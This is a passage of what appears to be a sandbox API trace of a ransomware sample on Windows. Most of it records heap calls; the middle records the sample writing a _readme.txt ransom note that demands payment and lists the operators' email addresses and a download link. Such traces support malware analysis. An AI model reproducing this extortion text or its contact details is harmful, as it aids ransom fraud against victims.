| out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.478] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0228.478] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.478] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.478] PathFindFileNameW (pszPath="") returned="" [0228.478] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.478] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.478] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.479] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.479] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0228.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.479] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0228.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.479] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.479] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.479] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.480] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.480] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.480] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.480] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.480] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.481] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap 